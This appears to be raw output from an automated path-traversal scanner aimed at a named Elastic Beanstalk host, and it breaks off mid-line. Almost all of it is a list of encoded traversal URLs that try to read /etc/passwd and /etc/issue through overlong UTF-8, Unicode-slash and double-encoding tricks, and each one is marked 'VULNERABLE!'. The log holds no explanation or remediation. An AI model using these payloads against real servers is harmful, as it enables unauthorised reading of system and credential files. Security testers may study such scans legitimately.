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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%9cetc%c1%9cpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%9cetc%c1%9cissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%9c?.%c1%9cetc%c1%9cpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%9c?.%c1%9cetc%c1%9cissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%9c?.%c1%9c?.%c1%9cetc%c1%9cpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%9c?.%c1%9c?.%c1%9cetc%c1%9cissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%9c?.%c1%9c?.%c1%9c?.%c1%9cetc%c1%9cpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%9c?.%c1%9c?.%c1%9c?.%c1%9cetc%c1%9cissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%9c?.%c1%9c?.%c1%9c?.%c1%9c?.%c1%9cetc%c1%9cpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%9c?.%c1%9c?.%c1%9c?.%c1%9c?.%c1%9cetc%c1%9cissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%9c?.%c1%9c?.%c1%9c?.%c1%9c?.%c1%9c?.%c1%9cetc%c1%9cpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%9c?.%c1%9c?.%c1%9c?.%c1%9c?.%c1%9c?.%c1%9cetc%c1%9cissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%pcetc%c1%pcpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%pcetc%c1%pcissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%pc?.%c1%pcetc%c1%pcpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%pc?.%c1%pcetc%c1%pcissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%pc?.%c1%pc?.%c1%pcetc%c1%pcpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%pc?.%c1%pc?.%c1%pcetc%c1%pcissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%pc?.%c1%pc?.%c1%pc?.%c1%pcetc%c1%pcpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%pc?.%c1%pc?.%c1%pc?.%c1%pcetc%c1%pcissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%pc?.%c1%pc?.%c1%pc?.%c1%pc?.%c1%pcetc%c1%pcpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%pc?.%c1%pc?.%c1%pc?.%c1%pc?.%c1%pcetc%c1%pcissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%pc?.%c1%pc?.%c1%pc?.%c1%pc?.%c1%pc?.%c1%pcetc%c1%pcpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%pc?.%c1%pc?.%c1%pc?.%c1%pc?.%c1%pc?.%c1%pcetc%c1%pcissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c0%9vetc%c0%9vpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c0%9vetc%c0%9vissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c0%9v?.%c0%9vetc%c0%9vpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c0%9v?.%c0%9vetc%c0%9vissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c0%9v?.%c0%9v?.%c0%9vetc%c0%9vpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c0%9v?.%c0%9v?.%c0%9vetc%c0%9vissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c0%9v?.%c0%9v?.%c0%9v?.%c0%9vetc%c0%9vpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c0%9v?.%c0%9v?.%c0%9v?.%c0%9vetc%c0%9vissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c0%9v?.%c0%9v?.%c0%9v?.%c0%9v?.%c0%9vetc%c0%9vpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c0%9v?.%c0%9v?.%c0%9v?.%c0%9v?.%c0%9vetc%c0%9vissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c0%9v?.%c0%9v?.%c0%9v?.%c0%9v?.%c0%9v?.%c0%9vetc%c0%9vpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c0%9v?.%c0%9v?.%c0%9v?.%c0%9v?.%c0%9v?.%c0%9vetc%c0%9vissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c0%qfetc%c0%qfpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c0%qfetc%c0%qfissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c0%qf?.%c0%qfetc%c0%qfpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c0%qf?.%c0%qfetc%c0%qfissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c0%qf?.%c0%qf?.%c0%qfetc%c0%qfpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c0%qf?.%c0%qf?.%c0%qfetc%c0%qfissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c0%qf?.%c0%qf?.%c0%qf?.%c0%qfetc%c0%qfpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c0%qf?.%c0%qf?.%c0%qf?.%c0%qfetc%c0%qfissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c0%qf?.%c0%qf?.%c0%qf?.%c0%qf?.%c0%qfetc%c0%qfpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c0%qf?.%c0%qf?.%c0%qf?.%c0%qf?.%c0%qfetc%c0%qfissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c0%qf?.%c0%qf?.%c0%qf?.%c0%qf?.%c0%qf?.%c0%qfetc%c0%qfpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c0%qf?.%c0%qf?.%c0%qf?.%c0%qf?.%c0%qf?.%c0%qfetc%c0%qfissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%8setc%c1%8spasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%8setc%c1%8sissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%8s?.%c1%8setc%c1%8spasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%8s?.%c1%8setc%c1%8sissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%8s?.%c1%8s?.%c1%8setc%c1%8spasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%8s?.%c1%8s?.%c1%8setc%c1%8sissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%8s?.%c1%8s?.%c1%8s?.%c1%8setc%c1%8spasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%8s?.%c1%8s?.%c1%8s?.%c1%8setc%c1%8sissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%8s?.%c1%8s?.%c1%8s?.%c1%8s?.%c1%8setc%c1%8spasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%8s?.%c1%8s?.%c1%8s?.%c1%8s?.%c1%8setc%c1%8sissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%8s?.%c1%8s?.%c1%8s?.%c1%8s?.%c1%8s?.%c1%8setc%c1%8spasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%8s?.%c1%8s?.%c1%8s?.%c1%8s?.%c1%8s?.%c1%8setc%c1%8sissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%1cetc%c1%1cpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%1cetc%c1%1cissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%1c?.%c1%1cetc%c1%1cpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%1c?.%c1%1cetc%c1%1cissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%1c?.%c1%1c?.%c1%1cetc%c1%1cpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%1c?.%c1%1c?.%c1%1cetc%c1%1cissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%1c?.%c1%1c?.%c1%1c?.%c1%1cetc%c1%1cpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%1c?.%c1%1c?.%c1%1c?.%c1%1cetc%c1%1cissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%1c?.%c1%1c?.%c1%1c?.%c1%1c?.%c1%1cetc%c1%1cpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%1c?.%c1%1c?.%c1%1c?.%c1%1c?.%c1%1cetc%c1%1cissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%1c?.%c1%1c?.%c1%1c?.%c1%1c?.%c1%1c?.%c1%1cetc%c1%1cpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%1c?.%c1%1c?.%c1%1c?.%c1%1c?.%c1%1c?.%c1%1cetc%c1%1cissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%afetc%c1%afpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%afetc%c1%afissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%af?.%c1%afetc%c1%afpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%af?.%c1%afetc%c1%afissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%af?.%c1%af?.%c1%afetc%c1%afpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%af?.%c1%af?.%c1%afetc%c1%afissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%af?.%c1%af?.%c1%af?.%c1%afetc%c1%afpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%af?.%c1%af?.%c1%af?.%c1%afetc%c1%afissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%af?.%c1%af?.%c1%af?.%c1%af?.%c1%afetc%c1%afpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%af?.%c1%af?.%c1%af?.%c1%af?.%c1%afetc%c1%afissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%af?.%c1%af?.%c1%af?.%c1%af?.%c1%af?.%c1%afetc%c1%afpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%c1%af?.%c1%af?.%c1%af?.%c1%af?.%c1%af?.%c1%afetc%c1%afissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%bg%qfetc%bg%qfpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%bg%qfetc%bg%qfissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%bg%qf?.%bg%qfetc%bg%qfpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%bg%qf?.%bg%qfetc%bg%qfissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%bg%qf?.%bg%qf?.%bg%qfetc%bg%qfpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%bg%qf?.%bg%qf?.%bg%qfetc%bg%qfissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%bg%qf?.%bg%qf?.%bg%qf?.%bg%qfetc%bg%qfpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%bg%qf?.%bg%qf?.%bg%qf?.%bg%qfetc%bg%qfissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%bg%qf?.%bg%qf?.%bg%qf?.%bg%qf?.%bg%qfetc%bg%qfpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%bg%qf?.%bg%qf?.%bg%qf?.%bg%qf?.%bg%qfetc%bg%qfissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%bg%qf?.%bg%qf?.%bg%qf?.%bg%qf?.%bg%qf?.%bg%qfetc%bg%qfpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%bg%qf?.%bg%qf?.%bg%qf?.%bg%qf?.%bg%qf?.%bg%qfetc%bg%qfissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%u2215etc%u2215passwd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%u2215etc%u2215issue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%u2215?.%u2215etc%u2215passwd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%u2215?.%u2215etc%u2215issue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%u2215?.%u2215?.%u2215etc%u2215passwd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%u2215?.%u2215?.%u2215etc%u2215issue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%u2215?.%u2215?.%u2215?.%u2215etc%u2215passwd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%u2215?.%u2215?.%u2215?.%u2215etc%u2215issue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%u2215?.%u2215?.%u2215?.%u2215?.%u2215etc%u2215passwd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%u2215?.%u2215?.%u2215?.%u2215?.%u2215etc%u2215issue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%u2215?.%u2215?.%u2215?.%u2215?.%u2215?.%u2215etc%u2215passwd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%u2215?.%u2215?.%u2215?.%u2215?.%u2215?.%u2215etc%u2215issue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%u2216etc%u2216passwd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%u2216etc%u2216issue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%u2216?.%u2216etc%u2216passwd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%u2216?.%u2216etc%u2216issue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%u2216?.%u2216?.%u2216etc%u2216passwd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%u2216?.%u2216?.%u2216etc%u2216issue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%u2216?.%u2216?.%u2216?.%u2216etc%u2216passwd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%u2216?.%u2216?.%u2216?.%u2216etc%u2216issue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%u2216?.%u2216?.%u2216?.%u2216?.%u2216etc%u2216passwd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%u2216?.%u2216?.%u2216?.%u2216?.%u2216etc%u2216issue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%u2216?.%u2216?.%u2216?.%u2216?.%u2216?.%u2216etc%u2216passwd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%u2216?.%u2216?.%u2216?.%u2216?.%u2216?.%u2216etc%u2216issue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%uEFC8etc%uEFC8passwd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%uEFC8etc%uEFC8issue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%uEFC8?.%uEFC8etc%uEFC8passwd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%uEFC8?.%uEFC8etc%uEFC8issue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%uEFC8?.%uEFC8?.%uEFC8etc%uEFC8passwd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%uEFC8?.%uEFC8?.%uEFC8etc%uEFC8issue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%uEFC8?.%uEFC8?.%uEFC8?.%uEFC8etc%uEFC8passwd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%uEFC8?.%uEFC8?.%uEFC8?.%uEFC8etc%uEFC8issue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%uEFC8?.%uEFC8?.%uEFC8?.%uEFC8?.%uEFC8etc%uEFC8passwd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%uEFC8?.%uEFC8?.%uEFC8?.%uEFC8?.%uEFC8etc%uEFC8issue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%uEFC8?.%uEFC8?.%uEFC8?.%uEFC8?.%uEFC8?.%uEFC8etc%uEFC8passwd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%uEFC8?.%uEFC8?.%uEFC8?.%uEFC8?.%uEFC8?.%uEFC8etc%uEFC8issue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%uF025etc%uF025passwd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%uF025etc%uF025issue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%uF025?.%uF025etc%uF025passwd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%uF025?.%uF025etc%uF025issue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%uF025?.%uF025?.%uF025etc%uF025passwd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%uF025?.%uF025?.%uF025etc%uF025issue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%uF025?.%uF025?.%uF025?.%uF025etc%uF025passwd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%uF025?.%uF025?.%uF025?.%uF025etc%uF025issue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%uF025?.%uF025?.%uF025?.%uF025?.%uF025etc%uF025passwd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%uF025?.%uF025?.%uF025?.%uF025?.%uF025etc%uF025issue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%uF025?.%uF025?.%uF025?.%uF025?.%uF025?.%uF025etc%uF025passwd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%uF025?.%uF025?.%uF025?.%uF025?.%uF025?.%uF025etc%uF025issue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%%32%%66etc%%32%%66passwd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%%32%%66etc%%32%%66issue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%%32%%66?.%%32%%66etc%%32%%66passwd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%%32%%66?.%%32%%66etc%%32%%66issue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%%32%%66?.%%32%%66?.%%32%%66etc%%32%%66passwd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%%32%%66?.%%32%%66?.%%32%%66etc%%32%%66issue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%%32%%66?.%%32%%66?.%%32%%66?.%%32%%66etc%%32%%66passwd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%%32%%66?.%%32%%66?.%%32%%66?.%%32%%66etc%%32%%66issue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%%32%%66?.%%32%%66?.%%32%%66?.%%32%%66?.%%32%%66etc%%32%%66passwd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%%32%%66?.%%32%%66?.%%32%%66?.%%32%%66?.%%32%%66etc%%32%%66issue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%%32%%66?.%%32%%66?.%%32%%66?.%%32%%66?.%%32%%66?.%%32%%66etc%%32%%66passwd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%%32%%66?.%%32%%66?.%%32%%66?.%%32%%66?.%%32%%66?.%%32%%66etc%%32%%66issue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%%35%%63etc%%35%%63passwd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%%35%%63etc%%35%%63issue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%%35%%63?.%%35%%63etc%%35%%63passwd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%%35%%63?.%%35%%63etc%%35%%63issue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%%35%%63?.%%35%%63?.%%35%%63etc%%35%%63passwd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%%35%%63?.%%35%%63?.%%35%%63etc%%35%%63issue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%%35%%63?.%%35%%63?.%%35%%63?.%%35%%63etc%%35%%63passwd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%%35%%63?.%%35%%63?.%%35%%63?.%%35%%63etc%%35%%63issue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%%35%%63?.%%35%%63?.%%35%%63?.%%35%%63?.%%35%%63etc%%35%%63passwd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%%35%%63?.%%35%%63?.%%35%%63?.%%35%%63?.%%35%%63etc%%35%%63issue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%%35%%63?.%%35%%63?.%%35%%63?.%%35%%63?.%%35%%63?.%%35%%63etc%%35%%63passwd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%%35%%63?.%%35%%63?.%%35%%63?.%%35%%63?.%%35%%63?.%%35%%63etc%%35%%63issue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%e0%80%afetc%e0%80%afpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%e0%80%afetc%e0%80%afissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%e0%80%af?.%e0%80%afetc%e0%80%afpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%e0%80%af?.%e0%80%afetc%e0%80%afissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%e0%80%af?.%e0%80%af?.%e0%80%afetc%e0%80%afpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%e0%80%af?.%e0%80%af?.%e0%80%afetc%e0%80%afissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%e0%80%af?.%e0%80%af?.%e0%80%af?.%e0%80%afetc%e0%80%afpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%e0%80%af?.%e0%80%af?.%e0%80%af?.%e0%80%afetc%e0%80%afissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%e0%80%af?.%e0%80%af?.%e0%80%af?.%e0%80%af?.%e0%80%afetc%e0%80%afpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%e0%80%af?.%e0%80%af?.%e0%80%af?.%e0%80%af?.%e0%80%afetc%e0%80%afissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%e0%80%af?.%e0%80%af?.%e0%80%af?.%e0%80%af?.%e0%80%af?.%e0%80%afetc%e0%80%afpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%e0%80%af?.%e0%80%af?.%e0%80%af?.%e0%80%af?.%e0%80%af?.%e0%80%afetc%e0%80%afissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%25c1%259cetc%25c1%259cpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%25c1%259cetc%25c1%259cissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%25c1%259c?.%25c1%259cetc%25c1%259cpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%25c1%259c?.%25c1%259cetc%25c1%259cissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%25c1%259c?.%25c1%259c?.%25c1%259cetc%25c1%259cpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%25c1%259c?.%25c1%259c?.%25c1%259cetc%25c1%259cissue &lt;- 